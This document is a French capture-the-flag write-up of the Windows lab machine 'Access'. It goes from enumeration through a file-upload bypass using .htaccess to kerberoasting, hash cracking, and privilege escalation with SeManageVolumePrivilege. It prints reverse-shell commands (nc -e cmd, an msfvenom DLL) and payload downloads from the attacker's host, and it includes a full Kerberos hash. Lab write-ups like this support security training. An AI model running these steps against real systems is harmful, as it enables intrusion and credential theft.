# Access
`.htaccess` `SeManageVolumePrivilege` `Upload file` `SPN` `kerberoast`
* Nom machine : Access
* Difficulté : Intermédiaire
* OS : Windows
## Enumération
### NMAP
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-22 06:33 EDT
Nmap scan report for 192.168.178.187
Host is up (0.034s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Access The Event
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-22 10:38:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
49802/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
```
Nous avons un nom de domaine : access.offsec
### HTTP (80)
Nous allons chercher des directoires intéressants
```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.178.187/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460
Output File: /home/kali/reports/http_192.168.178.187/__24-08-22_06-34-49.txt
Target: http://192.168.178.187/
[06:34:49] Starting:
[06:34:50] 403 - 304B - /%3f/
[06:34:50] 403 - 304B - /%C0%AE%C0%AE%C0%AF
[06:34:50] 403 - 304B - /%ff
[06:34:51] 403 - 304B - /.htaccess.bak1
[06:34:51] 403 - 304B - /.htaccess.orig
[06:34:51] 403 - 304B - /.ht_wsr.txt
[06:34:51] 403 - 304B - /.htaccess_extra
[06:34:51] 403 - 304B - /.htaccess_sc
[06:34:51] 403 - 304B - /.htaccess.save
[06:34:51] 403 - 304B - /.htaccess.sample
[06:34:51] 403 - 304B - /.htaccessBAK
[06:34:51] 403 - 304B - /.htaccess_orig
[06:34:51] 403 - 304B - /.htaccessOLD
[06:34:51] 403 - 304B - /.htaccessOLD2
[06:34:51] 403 - 304B - /.htm
[06:34:51] 403 - 304B - /.html
[06:34:51] 403 - 304B - /.htpasswd_test
[06:34:51] 403 - 304B - /.htpasswds
[06:34:51] 403 - 304B - /.httr-oauth
[06:34:58] 301 - 343B - /assets -> http://192.168.178.187/assets/
[06:34:58] 200 - 2KB - /assets/
[06:35:00] 403 - 304B - /cgi-bin/
[06:35:00] 200 - 2KB - /cgi-bin/printenv.pl
[06:35:04] 301 - 342B - /forms -> http://192.168.178.187/forms/
[06:35:04] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[06:35:04] 503 - 404B - /examples/jsp/index.html
[06:35:04] 503 - 404B - /examples/servlet/SnoopServlet
[06:35:04] 503 - 404B - /examples
[06:35:04] 503 - 404B - /examples/websocket/index.xhtml
[06:35:04] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample
[06:35:04] 503 - 404B - /examples/
[06:35:04] 503 - 404B - /examples/servlets/servlet/CookieExample
[06:35:04] 503 - 404B - /examples/servlets/index.html
[06:35:04] 503 - 404B - /examples/jsp/snp/snoop.jsp
[06:35:05] 403 - 304B - /index.php::$DATA
[06:35:10] 403 - 423B - /phpmyadmin
[06:35:11] 403 - 423B - /phpmyadmin/doc/html/index.html
[06:35:11] 403 - 423B - /phpmyadmin/
[06:35:11] 403 - 423B - /phpmyadmin/docs/html/index.html
[06:35:11] 403 - 423B - /phpmyadmin/ChangeLog
[06:35:11] 403 - 423B - /phpmyadmin/phpmyadmin/index.php
[06:35:11] 403 - 423B - /phpmyadmin/index.php
[06:35:11] 403 - 423B - /phpmyadmin/scripts/setup.php
[06:35:11] 403 - 423B - /phpmyadmin/README
[06:35:13] 403 - 423B - /server-info
[06:35:13] 403 - 423B - /server-status/
[06:35:13] 403 - 423B - /server-status
[06:35:17] 403 - 304B - /Trace.axd::$DATA
[06:35:17] 200 - 988B - /uploads/
[06:35:17] 301 - 344B - /uploads -> http://192.168.178.187/uploads/
[06:35:19] 403 - 304B - /web.config::$DATA
[06:35:19] 403 - 423B - /webalizer
[06:35:19] 403 - 423B - /webalizer/
Task Completed
```
/uploads pourrait être utile.
Lorsqu'on veut acheter un ticket :
Nous avons essayé d'upload un gif et cela a fonctionné, nous l'avons retrouver dans /uploads
Nous allons maintenant chercher à obtenir un shell.
## Accès Initial
Une simple modification dans burp suite fonctionne. En effet, nous avons modifié l'extension .php en .gif. Le fichier ne peut s'exécuter mais nous avons une piste, et nous savons que nous avons juste à jouer avec les extensions de fichier.
Une simple suppression d'extension marche, ainsi que l'encodage du point de l'extension en URL.
Cependant on n'arrive pas à exécuter de commandes.
Nous allons chercher plus loin.
{% embed url="" %}
Nous allons upload un fichier .htaccess permettant d'exécuter du code php avec l'extension choisi : ici "php16"
```
┌──(kali㉿kali)-[~]
└─$ echo "AddType application/x-httpd-php .php16> .htaccess
```
Maintenant, si on upload shell.php16, le code php s'exécutent belle et bien. Deux solutions s'offrent à nous :
* 1: on injecte le payload powershell base64 dans le paramètre cmd (via la barre ou l'url)
* 2: on upload directement un reverse shell (Ivan Sincek)
```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 135
listening on [any] 135 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51564
SOCKET: Shell has connected! PID: 4592
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>whoami
access\svc_apache
```
## Elévation des privilèges
En fouillant et exécutant winpeas, nous ne trouvons rien d'intéressant.
Nous allons tenter une attaque kerberoast avec rubeus.
```
S C:\xampp\htdocs\uploads> ./rubeus.exe kerberoast /outfile:hash.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_mssql
[*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName : MSSQLSvc/DC.access.offsec
[*] PwdLastSet : 5/21/2022 5:33:45 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\uploads\hash.txt
[*] Roasted hashes written to : C:\xampp\htdocs\uploads\hash.txt
PS C:\xampp\htdocs\uploads> type hash.txt
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$C9F0EE98301607FC5A20D06B30A96230$C53E2A114FFAFF6A1004E1FBC4974DC2088E1C97ED90A9FC5C57DB357EE697345F5C4084A1C774023AA9B2FAD7A6B7DF85F370B9F17BBE7D4AA9C145357FBDFDE8CFA420CA7B517519D52A87887B75352D4A324D3AEF8B60E3AAB721B736C991E9EB84BDDDB33081F99DBC9A67116EEA87BB436B254565210A862DDAF897861E09CA2F5D88220F35625C702830AF968420852251A94E78CDE45B2C553988F3A81A12278B27A1CA5011D9D27519471DBD954DCA482D3D8BDB5DE0E9FF7A87A52C383217AB472C03B81BE46A55FC9888BF57A201EE55BE0DB9452BD3E10EBA2F07026FB438E1355822CD0F1E5A25D2E92D417B8BA62CA885418188BFBF06F089163C4232F6455D43647E263318E7BD328A68208A931F61C8D3EC284508FF56FA297CBF5F14ADB0D47F30A58D81A36F350DDA38F2C124844B21581CC7797AC18309AA672760A2EE936090277F1673E7AA5B044C529CC1C7AFEA0308EAC21E6FE27F061EB4974D947E7C1F95619294398E828D5CA17B2962DA7D25F9BA480C3DE8EE11E8C393814C247923F3C43891E3389396CF0D21E2EE58E5A45DF8070BF29B91D73E1540FAA743360E6776F843376DA880E552974599CE0CEA087303F939FC893063F518BBD7F002F8C4A035D5168A821920F484CDBD082EAD1702D2B2B8AA817D0C593854C36DE4AE6F0D0B363FF0039D0A28998D6B5A0D8F2AEE8434DB9E1E11FD15ACEB9821E97F63AF4F5B61D5B19C5973E68DA68FB34BFB01A267FC90B88A6ECADCDE51B07887FE61219FAE263C8C847EF718D33FC1D945A190DFD146393D4F56E7711A441453F6B83F87D88693856C4B87D6C52C3530429BA5F6041F3FC2CB9D3BA238F36777C9E939ED4720676E516E76B9A5367C6903D68FFC630B51F49491FD1D7D1C76C7D9512434B5B90C823D0C8F96B43FB1661022BC4F1F45518F5A0DA4CECE156D05B5EF7CABB7BAFCDC1A73CBA656F10EEEE82255206EE857C273C54F72552DCE9A35345B8E03897E6AE4C2BC31E8703BE26C3F93626C2181919B4B3AB79E38FA09FCEA043E0F8F187FCA4C03C1C4E597B118092E642525506D029155EEFC3691C64D7C5FD512FD83C69C6FDF8736D9B3E56502DBA144C3079C9CBCF0DE19D8E2F4FBC481495A645B64FB07B80B95F36CDE4DB1FFE9E56CBD733BEB8502CF11C31F6A5A87BD51A2E6C8BEA85B83E733B32E231E0E0B19104342917630564D2A7204FD9C20C68E703BCE447E52BF78E5FDCA8A5BCB1559669DA1B402EA3A4D5D929F23A6DDF6A7B5BC247BD5E2DDBB888CC010CBBF0429D608BC4755E13DD6C89491610643EDA8005424478AF164A1D47A3B6837FB7C13621EBE754219BEFCD5B25CC67C11FB5231B11F042F2F873EB526630B767C8A51D842637F5D03A6EB6E045DCAAD5D765680E307EDE7E160C513C375228582A38B71FFE72FEB723E1C847113F25541100A6D0688C01440F58DD464019E3800B703EE461EC01426E6363840D7309B07434DDF2C37D1BC568A9D090A3622DDA0E1D8546EABBBF76A13811DC36D042719A3325F973916998221C16745FDBA2C1420DA881935EE11B70F4C747A9DFC39E556A2DE0059C3
```
On recopie le fichier sur notre machine puis on va essayer de le cracker.
```
┌──(kali㉿kali)-[~/oscp]
└─$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
trustno1 (?)
1g 0:00:00:00 DONE 2/3 (2024-08-22 12:35) 25.00g/s 32000p/s 32000c/s 32000C/s 123456..burton
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Nous allons le mot de passe, nous allons tenter d'exécuter des commandes avec RunasCs
```
PS C:\xampp\htdocs\uploads> ./runas.exe svc_mssql trustno1 "cmd /c whoami /all"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
USER INFORMATION
----------------
User Name SID
================ ============================================
access\svc_mssql S-1-5-21-537427935-490066102-1511301751-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
```
Nous pouvons exécuter des commandes et nous pouvons constater que nous avons un nouveau privilège : `SeManageVolumePrivilege`
Nous allons exécuter un reverse shell afin de nous connecter en tant que svc\_mssql. Tout d'abord nous téléchargons nc.exe sur la cible.
```
PS C:\xampp\htdocs\uploads> ./runas.exe svc_mssql trustno1 "./nc.exe 192.168.45.189 135 -e cmd"
```
```
┌──(kali㉿kali)-[~/]
└─$ nc -lnvp 135
listening on [any] 135 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51840
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\svc_mssql
```
{% embed url="" %}
```
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.189 LPORT=1337 -f dll -o tzres.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: tzres.dll
PS C:\Users\svc_mssql\Desktop> iwr -uri http://192.168.45.189/Tools/SeManageVolumeExploit.exe -Outfile smve.exe
PS C:\Users\svc_mssql\Desktop> ./smve.exe
./smve.exe
Entries changed: 926
DONE
PS C:\windows\system32\wbem> iwr -uri http://192.168.45.189/tzres.dll -Outfile tzres.dll
```
```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51872
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\network service
```
Nous sommes admin !
